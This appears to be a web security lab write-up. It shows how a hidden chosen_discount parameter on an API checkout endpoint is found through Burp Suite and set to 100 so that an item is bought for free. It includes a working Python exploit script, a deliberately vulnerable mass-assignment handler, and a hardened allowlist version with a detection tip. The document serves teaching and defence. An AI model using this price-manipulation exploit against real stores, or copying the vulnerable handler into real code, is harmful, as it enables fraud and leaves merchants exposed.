3. Finding and exploiting an unused API endpoint

Let's open the vulnerable lab:

Let's sign in if we want:

Now let's navigate through the website to crawl some pages and functionality:

After logging in again:

Let's move on to Burp Suite to see the history:

We found a GET request with these object fields, or parameters, which are not present in the next image, which shows the POST parameters:

And a POST request with some parameters:

Let's send it to the Repeater and see if we can change the item price so we can buy it:

So we have to set a number:

And as a string:

It works with numbers, but there may be some validation, because the price did not change when we changed the request to GET:

But we have something else in the hidden parameters: a chosen_discount parameter. Let's try to exploit it:

Here we go: if we add it, no error occurs.

Let's try using a string:

Here we have an error:

And here we go:

Here is the vulnerability: we found a hidden parameter and sent it with a string and with a number. It errors with a string but works perfectly with a number, so we can abuse it and set the discount to 100 to get the item for free.

We solved the lab:

Solve it using a Python 3 script:

```python
import re
import os
import sys

import requests

# Route traffic through Burp so the requests show up in the proxy history.
proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080"
}

session = requests.session()


def Login(url, username, password):
    print("[*] Get CSRF Token.")
    # The login form carries a CSRF token that has to be sent back with the credentials.
    csrf = re.findall(r'name="csrf" value="(.+?)"', session.get(url=url + "login", proxies=proxies, verify=False).text)
    if not csrf:
        print("[-] Could not find the CSRF token on the login page.")
        sys.exit(1)
    print("[*] Logging In.")
    data = {"csrf": csrf[0], "username": username, "password": password}
    session.post(url=url + "login", data=data, allow_redirects=True, proxies=proxies, verify=False)


def Discount(url):
    print("[*] Change The Discount To 100.")
    # chosen_discount is the hidden parameter found in the proxy history; the
    # server accepts it as a number, so a 100% discount makes the item free.
    data = {
        "chosen_discount": {
            "percentage": 100
        },
        "chosen_products": [
            {
                "product_id": "1",
                "quantity": 1
            }
        ]
    }
    session.post(url=url + "api/checkout", json=data, proxies=proxies, verify=False)


if __name__ == "__main__":
    if len(sys.argv) != 2:
        script_name = os.path.basename(__file__)
        print(f"[-] Usage: python {script_name} http://localhost/")
        sys.exit(1)
    url = sys.argv[1]
    # The functions append "login" and "api/checkout", so the base URL needs a trailing slash.
    if not url.endswith("/"):
        url += "/"
    Login(url, "wiener", "peter")
    Discount(url)
    print("[+] Solved.")
```
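To show why the hidden chosen_discount parameter is accepted at all, here is an added example (not the lab's code and not from the original post) of a checkout handler that binds every JSON field the client sends, next to a hardened version that allowlists the request fields and takes the discount only from server-side state. The field names follow the request above; the catalogue prices and the discount rule are constructed for the example.

```python
from decimal import Decimal

# Constructed catalogue: product_id -> unit price.
PRICES = {"1": Decimal("1337.00"), "2": Decimal("12.50")}


class ValidationError(ValueError):
    pass


def vulnerable_total(body: dict) -> Decimal:
    """Mass assignment: every field in the request body overrides the order defaults,
    so a client-supplied chosen_discount is trusted just like chosen_products."""
    order = {"chosen_discount": {"percentage": 0}}
    order.update(body)
    subtotal = sum(PRICES[p["product_id"]] * p["quantity"] for p in order["chosen_products"])
    pct = Decimal(order["chosen_discount"]["percentage"])
    return subtotal * (100 - pct) / 100


ALLOWED_FIELDS = {"chosen_products"}


def hardened_total(body: dict, user_discount_pct: int = 0) -> Decimal:
    """Allowlist the fields a client may send and validate each product line.
    The discount comes from the server's own record of the user, never the body."""
    unexpected = set(body) - ALLOWED_FIELDS
    if unexpected:
        raise ValidationError(f"unexpected fields: {sorted(unexpected)}")
    products = body.get("chosen_products")
    if not isinstance(products, list) or not products:
        raise ValidationError("chosen_products must be a non-empty list")
    subtotal = Decimal(0)
    for p in products:
        pid, qty = p.get("product_id"), p.get("quantity")
        if pid not in PRICES or not isinstance(qty, int) or qty < 1:
            raise ValidationError("invalid product line")
        subtotal += PRICES[pid] * qty
    if not 0 <= user_discount_pct <= 100:
        raise ValidationError("discount out of range")
    return subtotal * (100 - user_discount_pct) / 100


def is_rejected(body: dict) -> bool:
    """True if the hardened handler refuses the request (useful for tests and logging)."""
    try:
        hardened_total(body)
    except ValidationError:
        return True
    return False
```

Logging the rejected field names from the hardened handler also gives a detection signal: a checkout request carrying chosen_discount is never produced by the legitimate front end.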
